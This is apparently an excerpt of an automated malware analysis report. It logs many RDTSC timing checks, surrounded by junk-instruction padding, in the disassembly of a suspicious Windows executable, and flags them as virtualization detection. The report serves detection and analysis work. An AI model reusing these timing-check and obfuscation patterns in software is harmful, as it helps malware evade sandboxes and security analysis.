Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 14E19FC second address: 14E1A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165C9F4 second address: 165C9FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165C9FA second address: 165CA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165CA00 second address: 165CA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165CA04 second address: 165CA0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165BBCE second address: 165BBD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165BBD5 second address: 165BBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165BE8D second address: 165BE91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165BE91 second address: 165BE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165BE97 second address: 165BEA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4464DAB8C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165BEA2 second address: 165BEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165BFDD second address: 165BFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4464DAB8C6h 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165C2EA second address: 165C2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165C2EE second address: 165C2F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165C2F4 second address: 165C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4464F4BF1Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165C308 second address: 165C340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F4464DAB8C6h 0x0000000b jmp 00007F4464DAB8D6h 0x00000010 jmp 00007F4464DAB8D2h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DC30 second address: 165DC48 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4464F4BF18h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F4464F4BF18h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DC48 second address: 14E19FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F4464DAB8C6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnc 00007F4464DAB8DDh 0x00000016 jns 00007F4464DAB8D7h 0x0000001c jmp 00007F4464DAB8D1h 0x00000021 pop eax 0x00000022 mov ecx, 624E44E3h 0x00000027 push dword ptr [ebp+129C05D9h] 0x0000002d call dword ptr [ebp+129C1F4Ah] 0x00000033 pushad 0x00000034 mov dword ptr [ebp+129C1AF0h], esi 0x0000003a xor eax, eax 0x0000003c pushad 0x0000003d mov dx, ax 0x00000040 mov edx, dword ptr [ebp+129C291Ch] 0x00000046 popad 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b jmp 00007F4464DAB8D2h 0x00000050 jne 00007F4464DAB8CCh 0x00000056 mov dword ptr [ebp+129C1AF0h], ebx 0x0000005c mov dword ptr [ebp+129C2AE8h], eax 0x00000062 jmp 00007F4464DAB8D5h 0x00000067 mov esi, 0000003Ch 0x0000006c mov dword ptr [ebp+129C1C6Eh], eax 0x00000072 add esi, dword ptr [esp+24h] 0x00000076 clc 0x00000077 lodsw 0x00000079 sub dword ptr [ebp+129C1F18h], ecx 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 jmp 00007F4464DAB8CFh 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c pushad 0x0000008d and eax, 7E8D2F45h 0x00000093 mov edi, dword ptr [ebp+129C1AF0h] 0x00000099 popad 0x0000009a cld 0x0000009b push eax 0x0000009c push eax 0x0000009d push edx 0x0000009e push eax 0x0000009f push edx 0x000000a0 jmp 00007F4464DAB8CAh 0x000000a5 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DD08 second address: 165DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DD0E second address: 165DD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DD12 second address: 165DD9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 5D8D4298h 0x0000000f mov esi, dword ptr [ebp+129C29C8h] 0x00000015 push 00000003h 0x00000017 mov esi, dword ptr [ebp+129C2904h] 0x0000001d push 00000000h 0x0000001f call 00007F4464F4BF23h 0x00000024 mov dword ptr [ebp+129C371Fh], ebx 0x0000002a pop esi 0x0000002b push 00000003h 0x0000002d mov edi, dword ptr [ebp+129C2B64h] 0x00000033 push 9C4D108Ah 0x00000038 pushad 0x00000039 jmp 00007F4464F4BF27h 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 pop edx 0x00000042 popad 0x00000043 add dword ptr [esp], 23B2EF76h 0x0000004a sub dword ptr [ebp+129C1BB0h], edx 0x00000050 lea ebx, dword ptr [ebp+12B3FB53h] 0x00000056 jmp 00007F4464F4BF1Eh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DD9D second address: 165DDA7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4464DAB8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DDA7 second address: 165DDB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4464F4BF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DDB1 second address: 165DDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 165DFE9 second address: 165E066 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4464F4BF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f add dword ptr [esp], 43CE1600h 0x00000016 mov dword ptr [ebp+129C1EC0h], eax 0x0000001c push 00000003h 0x0000001e mov dword ptr [ebp+129C2C58h], eax 0x00000024 push 00000000h 0x00000026 mov dl, bl 0x00000028 push 00000003h 0x0000002a mov esi, 4F980981h 0x0000002f jmp 00007F4464F4BF20h 0x00000034 push BD806EBBh 0x00000039 push eax 0x0000003a push eax 0x0000003b push esi 0x0000003c pop esi 0x0000003d pop eax 0x0000003e pop eax 0x0000003f xor dword ptr [esp], 7D806EBBh 0x00000046 mov ecx, 3FECC900h 0x0000004b lea ebx, dword ptr [ebp+12B3FB67h] 0x00000051 jbe 00007F4464F4BF2Ch 0x00000057 jmp 00007F4464F4BF26h 0x0000005c push eax 0x0000005d push ebx 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 166FE00 second address: 166FE06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 166FE06 second address: 166FE10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4464F4BF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 166FE10 second address: 166FE14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 166FE14 second address: 166FE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16808D4 second address: 16808D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16808D8 second address: 16808DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16808DE second address: 16808E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 164A9A9 second address: 164A9C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 164A9C1 second address: 164A9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 164A9C9 second address: 164A9E5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4464F4BF16h 0x00000008 jmp 00007F4464F4BF1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 164A9E5 second address: 164A9F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 164A9F2 second address: 164AA11 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4464F4BF16h 0x00000008 jmp 00007F4464F4BF22h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167E8E1 second address: 167E8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167EB7E second address: 167EB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167EB82 second address: 167EB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F17C second address: 167F180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F180 second address: 167F194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F194 second address: 167F19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F19E second address: 167F1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 jng 00007F4464DAB8CEh 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F4464DAB8C6h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F1B6 second address: 167F1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F8E9 second address: 167F8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F8EF second address: 167F8F9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4464F4BF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F8F9 second address: 167F903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 167F903 second address: 167F913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4464F4BF1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1680187 second address: 168018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168018D second address: 168019C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F4464F4BF16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168019C second address: 16801A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16837F2 second address: 1683808 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4464F4BF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F4464F4BF18h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1684F15 second address: 1684F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1684F19 second address: 1684F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1686442 second address: 168644E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4464DAB8C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168644E second address: 1686453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1686453 second address: 1686458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1686458 second address: 168648A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F4464F4BF21h 0x0000000b popad 0x0000000c jo 00007F4464F4BF1Ah 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push eax 0x0000001b pop eax 0x0000001c pop eax 0x0000001d push ebx 0x0000001e jne 00007F4464F4BF16h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168DB9A second address: 168DB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168DB9E second address: 168DBB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4464F4BF1Ch 0x0000000c jno 00007F4464F4BF16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168DBB0 second address: 168DBDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4464DAB8D9h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F4464DAB8C6h 0x00000013 jg 00007F4464DAB8C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168DBDD second address: 168DC0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4464F4BF16h 0x00000008 jnp 00007F4464F4BF16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 js 00007F4464F4BF33h 0x00000018 jmp 00007F4464F4BF25h 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16514B4 second address: 16514B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168D0E6 second address: 168D0F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4464F4BF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168D0F4 second address: 168D114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D6h 0x00000007 jp 00007F4464DAB8C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168D114 second address: 168D13C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F4464F4BF16h 0x00000009 pop edx 0x0000000a jnl 00007F4464F4BF1Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 ja 00007F4464F4BF38h 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F4464F4BF16h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168D29F second address: 168D2B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jns 00007F4464DAB8C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168D2B0 second address: 168D2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168DA04 second address: 168DA0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168DA0A second address: 168DA35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F4464F4BF29h 0x0000000e jp 00007F4464F4BF16h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168FA30 second address: 168FA39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168FAF4 second address: 168FB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 19010F1Eh 0x00000010 mov dword ptr [ebp+129C36D3h], ebx 0x00000016 push 5DB37A2Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F4464F4BF18h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168FF86 second address: 168FF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168FF8A second address: 168FF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168FF90 second address: 168FF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 168FF96 second address: 168FF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1690287 second address: 169028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 169028B second address: 1690291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1690291 second address: 16902B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 16902B2 second address: 16902B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1690901 second address: 1690921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1690D2C second address: 1690D3D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4464F4BF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 1690D3D second address: 1690D48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
